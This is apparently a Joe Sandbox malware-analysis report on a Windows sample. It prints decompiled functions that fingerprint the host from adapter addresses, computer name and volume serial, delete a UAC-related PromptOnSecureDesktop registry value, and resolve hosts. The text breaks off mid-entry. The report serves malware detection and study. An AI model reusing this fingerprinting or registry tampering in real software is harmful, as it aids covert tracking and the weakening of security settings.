                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00401AC3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 74libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 64%
                                                                                                                                  			E00401AC3() {
				signed int _v8;
				char _v12;
				signed int _v16;
				struct HINSTANCE__* _t19;
				intOrPtr _t24;
				intOrPtr _t26;
				intOrPtr* _t28;
				signed int _t39;
				void* _t41;
				intOrPtr _t43;

				_v16 = 0;
				_t19 = LoadLibraryA("Iphlpapi.dll");
				if(_t19 == 0) {
					L15:
					return _v16;
				}
				_t28 = GetProcAddress(_t19, "GetAdaptersAddresses");
				if(_t28 == 0) {
					L14:
					goto L15;
				}
				_push( &_v12);
				_v8 = 0;
				_v12 = 0;
				_push(0);
				while(1) {
					_t41 =  *_t28(2, 0, 0);
					if(_t41 != 0x6f) {
						break;
					}
					_t24 = E0040EBED(_v8, _v12);
					if(_t24 == 0) {
						break;
					}
					_push( &_v12);
					_v8 = _t24;
					_push(_t24);
				}
				if(_t41 != 0) {
					L11:
					if(_v8 != 0) {
						E0040EC2E(_v8);
					}
					L13:
					goto L14;
				}
				_t26 = _v8;
				if(_t26 == 0) {
					goto L13;
				} else {
					goto L8;
				}
				do {
					L8:
					_t43 =  *((intOrPtr*)(_t26 + 0x34));
					_t39 = 0;
					if(_t43 <= 0) {
						goto L10;
					} else {
						goto L9;
					}
					do {
						L9:
						_v16 = _v16 ^ ( *(_t26 + _t39 + 0x2c) & 0x000000ff) << (_t39 & 0x00000003) << 0x00000003;
						_t39 = _t39 + 1;
					} while (_t39 < _t43);
					L10:
					_t26 =  *((intOrPtr*)(_t26 + 8));
				} while (_t26 != 0);
				goto L11;
			}













                                                                                                                                  0x00401ad1
                                                                                                                                  0x00401ad4
                                                                                                                                  0x00401adc
                                                                                                                                  0x00401b6b
                                                                                                                                  0x00401b70
                                                                                                                                  0x00401b70
                                                                                                                                  0x00401aef
                                                                                                                                  0x00401af3
                                                                                                                                  0x00401b6a
                                                                                                                                  0x00000000
                                                                                                                                  0x00401b6a
                                                                                                                                  0x00401af9
                                                                                                                                  0x00401afa
                                                                                                                                  0x00401afd
                                                                                                                                  0x00401b00
                                                                                                                                  0x00401b1c
                                                                                                                                  0x00401b22
                                                                                                                                  0x00401b27
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00401b09
                                                                                                                                  0x00401b12
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00401b17
                                                                                                                                  0x00401b18
                                                                                                                                  0x00401b1b
                                                                                                                                  0x00401b1b
                                                                                                                                  0x00401b2b
                                                                                                                                  0x00401b5b
                                                                                                                                  0x00401b5e
                                                                                                                                  0x00401b63
                                                                                                                                  0x00401b68
                                                                                                                                  0x00401b69
                                                                                                                                  0x00000000
                                                                                                                                  0x00401b69
                                                                                                                                  0x00401b2d
                                                                                                                                  0x00401b32
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00401b34
                                                                                                                                  0x00401b34
                                                                                                                                  0x00401b34
                                                                                                                                  0x00401b37
                                                                                                                                  0x00401b3b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00401b3d
                                                                                                                                  0x00401b3d
                                                                                                                                  0x00401b4c
                                                                                                                                  0x00401b4f
                                                                                                                                  0x00401b50
                                                                                                                                  0x00401b54
                                                                                                                                  0x00401b54
                                                                                                                                  0x00401b57
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00401AD4
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 00401AE9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: GetAdaptersAddresses$Iphlpapi.dll
                                                                                                                                  • API String ID: 2574300362-1087626847
                                                                                                                                  • Opcode ID: 4ad453f95e319ae71f8ebabcc46d8d27ffdc7fe226df516f9f2c7e6519cf6946
                                                                                                                                  • Instruction ID: f6c238f91e07a5798e813b0b618c72a9a5addbcd8e0b61e0281ff71d4ef1483f
                                                                                                                                  • Opcode Fuzzy Hash: 4ad453f95e319ae71f8ebabcc46d8d27ffdc7fe226df516f9f2c7e6519cf6946
                                                                                                                                  • Instruction Fuzzy Hash: 3D11DA71E01124BFCB11DBA5DD858EEBBB9EB44B10B144077E005F72A1E7786E80CB98
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00408CEE Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 73COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 72%
                                                                                                                                  			E00408CEE() {
				intOrPtr* _v8;
				intOrPtr _v12;
				long _t15;
				char _t17;
				intOrPtr _t19;
				intOrPtr* _t20;
				void* _t25;
				signed int _t31;
				signed char _t35;
				signed int _t36;
				char* _t41;
				intOrPtr* _t42;
				signed int _t45;

				_push(_t34);
				_t31 = 0;
				if( *0x413380 == 0) {
					L17:
					return _t15;
				}
				_t15 = GetTickCount() -  *0x413388;
				if(_t15 < 0xea60) {
					goto L17;
				}
				_t41 =  *0x413380;
				_t17 =  *_t41;
				_t45 =  *(_t41 + 1);
				_t42 = _t41 + 5;
				_v12 = _t17;
				if(_t17 <= 0) {
					L16:
					_t15 = GetTickCount();
					 *0x413388 = _t15;
					goto L17;
				} else {
					_v8 = _t42;
					do {
						_t35 =  *_v8;
						if(_t35 != 8) {
							if(_t35 != 9) {
								_t36 = _t35;
								_t19 =  *((intOrPtr*)(0x413300 + _t36 * 4));
								if(_t19 == 0) {
									goto L12;
								}
								_t9 = _t19 + 0x34; // 0x3b10c483
								if(_t36 ==  *_t9) {
									_t13 = _t19 + 0x50; // 0x7486850
									_t20 =  *_t13;
									if(_t20 != 0) {
										 *_t20(_t45 >>  *(_t31 * 5 + _t42) & 0x00000001);
									}
									goto L16;
								}
								goto L12;
							}
							_t25 = E0040A688(_t45 >> _t35 & 0x00000001);
							L8:
							if(_t25 != 0) {
								_t6 = _v8 + 1; // 0x3cc6
								_t45 = _t45 |  *_t6;
							}
							goto L12;
						}
						_t25 = E0040A677(_t45 >> _t35 & 0x00000001);
						goto L8;
						L12:
						_v8 = _v8 + 5;
						_t31 = _t31 + 1;
					} while (_t31 < _v12);
					goto L16;
				}
			}
















                                                                                                                                  0x00408cf2
                                                                                                                                  0x00408cf4
                                                                                                                                  0x00408cfc
                                                                                                                                  0x00408dae
                                                                                                                                  0x00408db0
                                                                                                                                  0x00408db0
                                                                                                                                  0x00408d08
                                                                                                                                  0x00408d13
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00408d1b
                                                                                                                                  0x00408d21
                                                                                                                                  0x00408d24
                                                                                                                                  0x00408d27
                                                                                                                                  0x00408d2a
                                                                                                                                  0x00408d2f
                                                                                                                                  0x00408da1
                                                                                                                                  0x00408da1
                                                                                                                                  0x00408da8
                                                                                                                                  0x00000000
                                                                                                                                  0x00408d31
                                                                                                                                  0x00408d31
                                                                                                                                  0x00408d34
                                                                                                                                  0x00408d37
                                                                                                                                  0x00408d3c
                                                                                                                                  0x00408d50
                                                                                                                                  0x00408d6c
                                                                                                                                  0x00408d6f
                                                                                                                                  0x00408d78
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00408d7a
                                                                                                                                  0x00408d7d
                                                                                                                                  0x00408d8b
                                                                                                                                  0x00408d8b
                                                                                                                                  0x00408d90
                                                                                                                                  0x00408d9e
                                                                                                                                  0x00408da0
                                                                                                                                  0x00000000
                                                                                                                                  0x00408d90
                                                                                                                                  0x00000000
                                                                                                                                  0x00408d7d
                                                                                                                                  0x00408d5a
                                                                                                                                  0x00408d5f
                                                                                                                                  0x00408d62
                                                                                                                                  0x00408d67
                                                                                                                                  0x00408d67
                                                                                                                                  0x00408d67
                                                                                                                                  0x00000000
                                                                                                                                  0x00408d62
                                                                                                                                  0x00408d46
                                                                                                                                  0x00000000
                                                                                                                                  0x00408d7f
                                                                                                                                  0x00408d7f
                                                                                                                                  0x00408d83
                                                                                                                                  0x00408d84
                                                                                                                                  0x00000000
                                                                                                                                  0x00408d89

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTick
                                                                                                                                  • String ID: 0 v$localcfg
                                                                                                                                  • API String ID: 536389180-2166502722
                                                                                                                                  • Opcode ID: f778bec48d6853c61bba66ff70abee8b380bd23c812c2bd80f901189d0bf267b
                                                                                                                                  • Instruction ID: 1ef816322ecc1e041cdf399b9b138f6358d408137adc4a714cdb07e14db9ba06
                                                                                                                                  • Opcode Fuzzy Hash: f778bec48d6853c61bba66ff70abee8b380bd23c812c2bd80f901189d0bf267b
                                                                                                                                  • Instruction Fuzzy Hash: 0821C631610115AFCB109F64DE8169ABBB9EF20311B25427FD881F72D1DF38E940875C
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00AD7665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,00000000,00020119,?), ref: 00AD76D9
                                                                                                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 00AD796D
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00AD797E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseEnumOpen
                                                                                                                                  • String ID: PromptOnSecureDesktop
                                                                                                                                  • API String ID: 1332880857-2980165447
                                                                                                                                  • Opcode ID: 6add54f53aa26b9129486f5997ff6e8fcd40a3645fc937a9d882d7137db5ef12
                                                                                                                                  • Instruction ID: 6d14fffa52744168f974ad1ecc59a492c5a7c1baf100199d659b0ef862a875c7
                                                                                                                                  • Opcode Fuzzy Hash: 6add54f53aa26b9129486f5997ff6e8fcd40a3645fc937a9d882d7137db5ef12
                                                                                                                                  • Instruction Fuzzy Hash: A011AC71A04109AFDB118FA9DC45FEFBF78EB95710F140162F526EA291F7B18D408B60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0040BFCE Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 62COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  • Type = %d: works = %d cur_thr = %d num_thr = %d integr = %d integr_nl = %d fCntrl = %d time_ok_filt = %d cntr = %d time_nl_filt = %d last_time_work = %d last_time_getem = %d last_time_calc = %d last_time_nl, xrefs: 0040C057
                                                                                                                                  • 0 v, xrefs: 0040BFD0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTickwsprintf
                                                                                                                                  • String ID: Type = %d: works = %d cur_thr = %d num_thr = %d integr = %d integr_nl = %d fCntrl = %d time_ok_filt = %d cntr = %d time_nl_filt = %d last_time_work = %d last_time_getem = %d last_time_calc = %d last_time_nl$0 v
                                                                                                                                  • API String ID: 2424974917-2279882658
                                                                                                                                  • Opcode ID: 06c76dfdee32e392c5b9e14bf2ce1b6ffedea00b213a31f1363bbf4a57a4f60a
                                                                                                                                  • Instruction ID: 59a0723085258e1b6130595cff45262f63c8180c8ffe05f2a9b9c441a6a96c57
                                                                                                                                  • Opcode Fuzzy Hash: 06c76dfdee32e392c5b9e14bf2ce1b6ffedea00b213a31f1363bbf4a57a4f60a
                                                                                                                                  • Instruction Fuzzy Hash: 53115672200100FFDB529BA9DD44E567FA6FB88319B3491ACF6188A166D633D863EB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00401BDF Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 76%
                                                                                                                                  			E00401BDF() {
				long _v8;
				long _v12;
				void* _v27;
				char _v28;
				void* _t14;
				signed int _t21;
				signed int _t30;
				void* _t31;

				_v28 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t30 = 0;
				_v12 = 0;
				asm("stosb");
				_v8 = 0xf;
				_t14 = E00401AC3();
				if(_t14 == 0) {
					if(GetComputerNameA( &_v28,  &_v8) == 0) {
						L6:
						GetVolumeInformationA(0, 0, 4,  &_v12, 0, 0, 0, 0);
						return _v12;
					}
					_t21 = 0;
					if(_v8 <= 0) {
						goto L6;
					} else {
						goto L3;
					}
					do {
						L3:
						_t30 = _t30 ^  *(_t31 + _t21 - 0x18) << (_t21 & 0x00000003) << 0x00000003;
						_t21 = _t21 + 1;
					} while (_t21 < _v8);
					if(_t30 == 0) {
						goto L6;
					}
					return _t30;
				}
				return _t14;
			}











                                                                                                                                  0x00401bec
                                                                                                                                  0x00401bf2
                                                                                                                                  0x00401bf3
                                                                                                                                  0x00401bf4
                                                                                                                                  0x00401bf5
                                                                                                                                  0x00401bf7
                                                                                                                                  0x00401bf9
                                                                                                                                  0x00401bfc
                                                                                                                                  0x00401bfd
                                                                                                                                  0x00401c04
                                                                                                                                  0x00401c0b
                                                                                                                                  0x00401c1d
                                                                                                                                  0x00401c45
                                                                                                                                  0x00401c51
                                                                                                                                  0x00000000
                                                                                                                                  0x00401c57
                                                                                                                                  0x00401c1f
                                                                                                                                  0x00401c24
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00401c26
                                                                                                                                  0x00401c26
                                                                                                                                  0x00401c35
                                                                                                                                  0x00401c37
                                                                                                                                  0x00401c38
                                                                                                                                  0x00401c3f
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00401c41
                                                                                                                                  0x00401c5e

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00401AC3: LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00401AD4
                                                                                                                                    • Part of subcall function 00401AC3: GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 00401AE9
                                                                                                                                  • GetComputerNameA.KERNEL32 ref: 00401C15
                                                                                                                                  • GetVolumeInformationA.KERNEL32(00000000,00000000,00000004,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00000001), ref: 00401C51
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressComputerInformationLibraryLoadNameProcVolume
                                                                                                                                  • String ID: hi_id$localcfg
                                                                                                                                  • API String ID: 2777991786-2393279970
                                                                                                                                  • Opcode ID: 8706900559274ba91d770fb8bb1d60ecae66f9331a84d665d36368a2f022e804
                                                                                                                                  • Instruction ID: b3a67a5cb4ed68e183e77afdc8505cc80d304e276af6d439446d09174096bcc5
                                                                                                                                  • Opcode Fuzzy Hash: 8706900559274ba91d770fb8bb1d60ecae66f9331a84d665d36368a2f022e804
                                                                                                                                  • Instruction Fuzzy Hash: B2018072A44118BBEB10EAE8C8C59EFBABCAB48745F104476E602F3290D274DE4486A5
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 004096FF Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 88%
                                                                                                                                  			E004096FF(void* __ecx) {
				void* _v8;
				char* _t6;
				char* _t10;
				void* _t23;
				void* _t24;

				_t16 = __ecx;
				_push(__ecx);
				_t6 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8);
				_t24 = _t23 + 0x14;
				if(RegOpenKeyExA(0x80000001, _t6, 0, 0x103,  &_v8) == 0) {
					_t10 = E00402544(0x4122f8,  &E004106A0, 9, 0xe4, 0xc8);
					_t24 = _t24 + 0x14;
					RegDeleteValueA(_v8, _t10);
					RegCloseKey(_v8);
				}
				E0040EE2A(_t16, 0x4122f8, 0, 0x100);
				return 0;
			}








                                                                                                                                  0x004096ff
                                                                                                                                  0x00409702
                                                                                                                                  0x00409728
                                                                                                                                  0x0040972d
                                                                                                                                  0x0040973e
                                                                                                                                  0x0040974a
                                                                                                                                  0x0040974f
                                                                                                                                  0x00409756
                                                                                                                                  0x0040975f
                                                                                                                                  0x0040975f
                                                                                                                                  0x0040976d
                                                                                                                                  0x0040977b

                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,00000000,PromptOnSecureDesktop,00000000,?,?,0040A14A), ref: 00409736
                                                                                                                                  • RegDeleteValueA.ADVAPI32(0040A14A,00000000,?,?,?,?,?,?,?,?,?,0040A14A), ref: 00409756
                                                                                                                                  • RegCloseKey.ADVAPI32(0040A14A,?,?,?,?,?,?,?,?,?,0040A14A), ref: 0040975F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseDeleteOpenValue
                                                                                                                                  • String ID: PromptOnSecureDesktop
                                                                                                                                  • API String ID: 849931509-2980165447
                                                                                                                                  • Opcode ID: 3ed2d8a4ef93e96002676d69dab26ea3ef884a7e3a5dbf1cf8ebad134320f5ae
                                                                                                                                  • Instruction ID: 5e38ed9511aa8cc069582274463af9cddeeab7037fd65aad7bdf8be664a95ff7
                                                                                                                                  • Opcode Fuzzy Hash: 3ed2d8a4ef93e96002676d69dab26ea3ef884a7e3a5dbf1cf8ebad134320f5ae
                                                                                                                                  • Instruction Fuzzy Hash: 5AF0C8B2680118BBF3106B51AC0BFDF3A2CDB44704F100075F605B50D2E6E55E9082BD
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00AD9966 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,00000000), ref: 00AD999D
                                                                                                                                  • RegDeleteValueA.ADVAPI32(?,00000000), ref: 00AD99BD
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00AD99C6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseDeleteOpenValue
                                                                                                                                  • String ID: PromptOnSecureDesktop
                                                                                                                                  • API String ID: 849931509-2980165447
                                                                                                                                  • Opcode ID: ecc939a75216a7bc4a9662cd8f3630595b0eae10caf242afcee65d599bec8ec6
                                                                                                                                  • Instruction ID: fbbd30b9ee5931268bfc43edf1e8cbdaec19665d6d02a8975eb9aecd3ea4793a
                                                                                                                                  • Opcode Fuzzy Hash: ecc939a75216a7bc4a9662cd8f3630595b0eae10caf242afcee65d599bec8ec6
                                                                                                                                  • Instruction Fuzzy Hash: 03F0C2B2680208BBF7106B50AC07FDB3A2CDB94B10F100061FA06B5192F6E59F9082B9
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0042A6F8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __getptd.LIBCMTD ref: 0042A70D
                                                                                                                                    • Part of subcall function 004174B0: __getptd_noexit.LIBCMTD ref: 004174B6
                                                                                                                                  • __getptd.LIBCMTD ref: 0042A71B
                                                                                                                                  • ___DestructExceptionObject.LIBCMTD ref: 0042A788
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279779724.0000000000415000.00000020.00000001.01000000.00000003.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_415000_OcmKX57vR7.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __getptd$DestructExceptionObject__getptd_noexit
                                                                                                                                  • String ID: csm
                                                                                                                                  • API String ID: 4290476786-1018135373
                                                                                                                                  • Opcode ID: 18f22ba1b74fcc9731569e66d22ec055009045e094b273a5a82f3e0ca2ec7b3e
                                                                                                                                  • Instruction ID: 19b41c0f5f9f5006fc9355230a4f87480302ae86c7099d68876e55ecf8a42a62
                                                                                                                                  • Opcode Fuzzy Hash: 18f22ba1b74fcc9731569e66d22ec055009045e094b273a5a82f3e0ca2ec7b3e
                                                                                                                                  • Instruction Fuzzy Hash: 6A115878A00214ABCB04DF51E444A9E7BB2BF94315F94806AE8084B312C738DE92CB9A
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00ADDF6C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34threadsleepCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00ADDF87
                                                                                                                                  • Sleep.KERNEL32(00000000,?,?,00ADE584,00AD44E2), ref: 00ADDFA2
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00ADDFBA
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentThread$Sleep
                                                                                                                                  • String ID: 0 v
                                                                                                                                  • API String ID: 2068822874-3142137124
                                                                                                                                  • Opcode ID: 00222842cf4b27377529e63430db8cbc0b0fb89ac28641eb4cfa7891be51bad4
                                                                                                                                  • Instruction ID: 3b0aa89a74e08455d0647929c629b23bd7ff2962d857a987b11a29ce2e80a18e
                                                                                                                                  • Opcode Fuzzy Hash: 00222842cf4b27377529e63430db8cbc0b0fb89ac28641eb4cfa7891be51bad4
                                                                                                                                  • Instruction Fuzzy Hash: 02F05E76204204AFC7609F65FD88BA97FA5E74C312F118076E60BC2269C7B096858E2E
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00ADEEBB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 24timeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00ADEEC5
                                                                                                                                  • GetVolumeInformationA.KERNEL32(00000000,00000000,00000004,?,00000000,00000000,00000000,00000000), ref: 00ADEED9
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00ADEEDF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Time$CountFileInformationSystemTickVolume
                                                                                                                                  • String ID: 0 v
                                                                                                                                  • API String ID: 1209300637-3142137124
                                                                                                                                  • Opcode ID: 317f96d9bc7de3e67904a91eb6120da1bd741d4a36fd8a43a77db32c5f55538a
                                                                                                                                  • Instruction ID: 1673bc13977c8672636575d9c8a2f9c2942a42ce341afdc75306ae3be589e196
                                                                                                                                  • Opcode Fuzzy Hash: 317f96d9bc7de3e67904a91eb6120da1bd741d4a36fd8a43a77db32c5f55538a
                                                                                                                                  • Instruction Fuzzy Hash: 6BE0BFF5810104FFEB11EBB0EC4EEBB7BBCFB08315F504661B915D6090DAB49A448B64
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00AD28EB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: gethostbynameinet_addr
                                                                                                                                  • String ID: time_cfg$u6A
                                                                                                                                  • API String ID: 1594361348-1940331995
                                                                                                                                  • Opcode ID: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
                                                                                                                                  • Instruction ID: 96866c8320bb9eb7cc5da85a672670e49f1c920dbe96028dfd4dec1d8639c5e7
                                                                                                                                  • Opcode Fuzzy Hash: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
                                                                                                                                  • Instruction Fuzzy Hash: B1E082306082218FCB008B28F848ACA3BA4AF2A330F008192F082C32A0C7349C80EB80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00AD69C3 Relevance: 6.2, APIs: 4, Instructions: 199COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetFileAttributesA.KERNEL32(?,00000080), ref: 00AD69E5
                                                                                                                                  • SetFileAttributesA.KERNEL32(?,00000002), ref: 00AD6A26
                                                                                                                                  • GetFileSize.KERNEL32(000000FF,00000000), ref: 00AD6A3A
                                                                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 00AD6BD8
                                                                                                                                    • Part of subcall function 00ADEE95: GetProcessHeap.KERNEL32(00000000,?,00000000,00AD1DCF,?), ref: 00ADEEA8
                                                                                                                                    • Part of subcall function 00ADEE95: HeapFree.KERNEL32(00000000), ref: 00ADEEAF
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
